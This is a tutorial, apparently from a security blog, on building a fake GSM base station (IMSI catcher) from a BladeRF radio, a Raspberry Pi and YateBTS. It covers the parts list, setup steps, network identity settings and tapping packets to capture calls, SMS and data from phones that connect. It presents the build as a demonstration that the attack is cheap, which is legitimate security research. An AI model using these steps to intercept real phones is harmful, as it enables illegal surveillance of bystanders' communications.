GSM also known as “Global System for Mobiles” is a world-wide standard for digital cellular telephony, it is a published standard by the European Telecommunications Standards Institute (ETSI), and it is widely implemented in Europe, Asia and, increasingly, America. The GSM network is divided into three major systems: the Network Switching System (NSS), the Base Station Subsystem (BSS), and the Operation and Support System (OSS).
As we know that GSM is a broken protocol and many researchers such as Tobias Engel, Philippe Langlois, etc. have found and exploited vulnerabilities in the GSM protocol. A particularly easy attack vector remains the air interface (Uu), this is due to the weak authentication mechanism. GSM uses a unilateral authentication mechanism that merely authenticates the Mobile Station (MS) to the network, but fails to authenticate the network to the MS. This results in the ability of attackers to parade a rogue Base Transceiver Station (BTS) in place of an authentic one; forcing users to connect to it. In this document, we will look at building a working fake BTS using some cheap hardware available online.
Before we proceed, let’s understand a few things about a set of identifiers used in the GSM through which it is able to perform a subscriber’s mobility management and also addresses the remaining network elements. Some important addresses and identifiers that being used in GSM are:
- International Mobile Station Equipment Identity (IMEI)
- International Mobile Subscriber Identity (IMSI)
- Mobile Subscriber ISDN Number (MSISDN)
- Mobile Station Roaming Number (MSRN)
- Location Area Identity (LAI)
- Temporary Mobile Subscriber Identity (TMSI)
- Cell Identifier (CI)
Readers are advised to read the linked articles and understand, in basic terms, what these identifiers represent.
Now let’s look at the second system of the GSM network i.e. the Base Station System. Base Station Subsystem which is responsible for handling traffic and signaling between a mobile phone and Network Switching Subsystem. It also performs transcoding of speech channels, allocation of radio channels to mobile phones, paging, transmission and reception over the air interface and many other tasks related to the radio network.
The BSS consists of two parts:
- The Base Transceiver Station (BTS)
- The Base Station Controller (BSC)
The BTS is responsible for sending and receiving radio signals. A typical BTS consists of components such as a transceiver, a power amplifier, an antenna, a baseband receiver unit etc. Each BTS, deployed in the field, acts as a single cell.
Recent research and availability of cheap Software Defined Radio (SDR) and open source libraries for GSM protocols make it fairly easy to create a fake BTS. It is to be noted that this is illegal in many countries, though it still hasn’t deterred many from building one. Such a BTS created without is called Fake BTS or an IMSI catcher. This has been widely used by nation state actors to monitor malicious threat actors and for surveillance purposes.
Now let’s look at what one needs to build an IMSI catcher or FakeBTS.
In order to build a BTS some of the hardware required are:
- Any Full-Duplex SDR – We will be using BladeRF x40 from Nuand
- Two Quad-band Cellular Duck Antennas SMA
- A Raspberry Pi 3
- A microsd for RPI >= 8GB
- Any BTS Software – We would be using YateBTS.
- Linux Image for Rpi – We would be using Raspbian
- Firmware & FPGA image for BladeRF
Prepping and Configuring the Pi
To begin with, we shall first install the Raspbian image into the microSD card.
- To do this first insert the microSD card into the laptop using a suitable adapter.
- The first step is to use the dd command to load the image into the SD card as shown below:
|dd if=<path to image file> of=dev/mmcblk0 bs=1M|
NOTE: dev/mmcblk0 is the path to the mounted memory card. Also, block size (bs) can be set to 512B
Once installed, we shall now begin configuring the Raspberry Pi.
1. Insert the microSD into the Pi and boot it up. Now, it is important that you set up either a Wi-Fi or an Ethernet interface on the Pi, since we are going to be using this interface to interact with the Pi later.
Pro Tip! – To do this we suggest you connect the Pi to a router or an established network which has DHCP enabled. This will provide the Pi with an IP address that you can later discover using Linux utilities such as net discover or a tool such as Nmap.
2. Once the interfaces are configured. SSH into the Pi using the default username “pi”. (The default password is “raspberry”):
3. Next, we install a few dependencies as shown below, namely apache, bladerf, php5, libbladerf-dev, etc
4. Now start the bladerf-cli utility and type version into the prompt. This will give us details of the firmware we must download. Ensure that you download only the version displayed in the output.
Yate and YateBTS:
The next software that we install are perhaps the most essential components for our test. Yate and YATEBTS basically create a virtual telecommunications network for us in our laptops. How cool is that!
1. The first step to set up the YATE and YATE BTS is to download the software like so:
2. Build Yate and YateBTS, using the commands shown below:
3. Once these are installed, we shall create a symbolic link of the NIB web UI as shown:
4. And grant write permissions to the network configuration files.
With the following steps completed, we should now be able to access the BTS web UI from a browser.
Configuring the Network.
Almost there, so let’s get down to it.
1. The first thing we need to do is to provide an identity to our fake network. To do this, navigate to BTS Configuration > GSM subsection.
2. Next, we provide the identification to our network. Provide the Mobile Country code (MCC) and MNC value. We must also configure the radio frequencies to use. Use the method shown below: (You can search for MCC and MNC values for your country off the internet, just search for MCC MNC)
3. Once this is done, the last identification parameter is the Country Code. For example: for India, the CC is +91.
On to the fun part, the TAPPING panel in the Web GUI allows us to bounce all packets off our loopback interface like so:
The good news is since we haven’t configured any encryption on our very “authentic-looking” fake network, all we need to do is to take a dump of all the packets on the loopback interface to extract call information on all the GSM and GPRS packets.
Once all the configuration is complete, the only thing left to do is to start our BTS. To do this, simply log into the pi, and type the command listed below, into the console:
|sudo yate -s|
If you see no error messages, voila! you have your own personal GSM network!
To make absolutely sure, that everything is in order, check whether the LED on the BladeRF is blinking.
A BTS conceptually works just like a regular wireless Access Point. Just as someone can create a create a rogue network setting up a fake Access Point and try sniffing the Internet traffic. In the same way, a GSM/GPRS network could be set up by a malicious actor enabling him to perform a MITM attack. All the communication including Internet traffic, calls and short messages (SMS) are in the hands of the attacker once a cellphone latches on to the fake BTS (due to no authentication in the GSM Protocol). Here’s what our final setup looks like:
In this document, we have proved that it is possible to set up fully functioning fake BTS that could be used by threat actors to perform MITM attacks on the Um interface of a GSM network. Also, all the equipment used in the project was off the shelf equipment. Total cost to set this up – under USD 500. A skilled attacker using open source solutions can cause serious damage and compromise the integrity of a communication channel. He may also attack regular mobile stations along with other equipment communicating with the user of the Um Interface.